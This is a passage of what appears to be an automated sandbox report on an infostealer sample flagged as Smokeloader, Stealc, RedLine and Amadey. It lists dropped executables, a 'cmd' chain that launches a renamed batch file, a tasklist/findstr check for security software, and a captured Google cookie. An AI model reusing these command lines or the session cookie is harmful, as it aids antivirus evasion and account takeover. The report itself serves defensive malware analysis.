version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=516=eLtuQCG4EKOUiy_WkIWBEoarZIHSwG7qGlWLFpSQnVFe8D_MZ9msw9JLMJwj8x708HeKW6qgHSTPUcFjpzJ8ZYyqvyV3spkA26VZGF4EVJPCbE-E1tXgy8VtJWXjgpQJTmQfV6E2tDYD3sQA5CvGeAKYlXOoJRi2UpDnhZW-H8M
2024-07-26 16:00:58 UTC	3311	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 16:00:58 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-IIu3jmADiTWTYSF8u8SOCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/;report-uri /v3/signin/_/AccountsSi [TRUNCATED] Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.lJ2U8FrhmKc.es5.O/;report-uri /v3/signin/_/AccountsSignInUi/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi" Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: cross-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	11:55:59
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	250'368 bytes
MD5 hash:	8E3C2682F9743107CB2B3A3D15B072F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:56:20
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:56:20
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:56:21
Start date:	26/07/2024
Path:	C:\Users\user\AppData\RoamingBKKFHIEGDH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"
Imagebase:	0xa50000
File size:	1'939'456 bytes
MD5 hash:	C6620FE2690605F20F5B9C970E8130C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2268957784.0000000000A51000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2225343744.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:56:22
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:56:22
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:56:22
Start date:	26/07/2024
Path:	C:\Users\user\AppData\RoamingAEGIJKEHCA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"
Imagebase:	0x3e0000
File size:	1'895'424 bytes
MD5 hash:	2985641A4880DB928DCF810EAA14041D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.2345647298.00000000003E1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2257667702.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:56:23
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xec0000
File size:	1'939'456 bytes
MD5 hash:	C6620FE2690605F20F5B9C970E8130C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2308246588.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2265462516.0000000005430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:56:23
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xec0000
File size:	1'939'456 bytes
MD5 hash:	C6620FE2690605F20F5B9C970E8130C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2270527993.0000000005570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2311063767.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:56:25
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504
Imagebase:	0x540000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:56:30
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x9c0000
File size:	1'895'424 bytes
MD5 hash:	2985641A4880DB928DCF810EAA14041D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2374868692.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000003.2334562706.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:56:31
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0x9c0000
File size:	1'895'424 bytes
MD5 hash:	2985641A4880DB928DCF810EAA14041D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000003.2334485830.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.2374750517.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:57:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x9c0000
File size:	1'895'424 bytes
MD5 hash:	2985641A4880DB928DCF810EAA14041D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000003.2619079052.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	11:57:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xec0000
File size:	1'939'456 bytes
MD5 hash:	C6620FE2690605F20F5B9C970E8130C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.2615701145.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	11:57:04
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Imagebase:	0x400000
File size:	867'038 bytes
MD5 hash:	569720E2C07B1D34BAC1366BF2B1C97A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:57:05
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Imagebase:	0x400000
File size:	250'368 bytes
MD5 hash:	8E3C2682F9743107CB2B3A3D15B072F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:57:07
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:57:07
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:57:08
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Imagebase:	0x800000
File size:	311'296 bytes
MD5 hash:	4E0235942A9CDE99EE2EE0EE1A736E4F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:57:08
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1040
Imagebase:	0x540000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:57:08
Start date:	26/07/2024
Path:	C:\Users\user\1000003002\ead6a72944.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\1000003002\ead6a72944.exe"
Imagebase:	0x400000
File size:	91'648 bytes
MD5 hash:	5C88DA04EC807C26F6DB500EEB8D983B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\1000003002\ead6a72944.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:57:08
Start date:	26/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Imagebase:	0x7ff665540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:57:08
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:57:09
Start date:	26/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:57:09
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:57:09
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:57:10
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x8f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:57:10
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x970000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:57:10
Start date:	26/07/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	11:57:10
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	11:57:10
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	11:57:10
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	11:57:11
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	11:57:12
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	11:57:12
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Imagebase:	0x7ff6c7040000
File size:	2'755'072 bytes
MD5 hash:	410E91A252FFE557A41E66A174CD6DCB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	11:57:15
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Imagebase:	0x400000
File size:	250'368 bytes
MD5 hash:	8E3C2682F9743107CB2B3A3D15B072F5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	11:57:15
Start date:	26/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	11:57:22
Start date:	26/07/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 004195E0 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,026B5B28), ref: 004195FD
GetProcAddress.KERNEL32(75900000,026B5948), ref: 00419615
GetProcAddress.KERNEL32(75900000,026D6BC8), ref: 0041962E
GetProcAddress.KERNEL32(75900000,026D6BF8), ref: 00419646
GetProcAddress.KERNEL32(75900000,026D6CB8), ref: 0041965E
GetProcAddress.KERNEL32(75900000,026D6AF0), ref: 00419677
GetProcAddress.KERNEL32(75900000,026B9500), ref: 0041968F
GetProcAddress.KERNEL32(75900000,026D6B80), ref: 004196A7
GetProcAddress.KERNEL32(75900000,026D6B98), ref: 004196C0
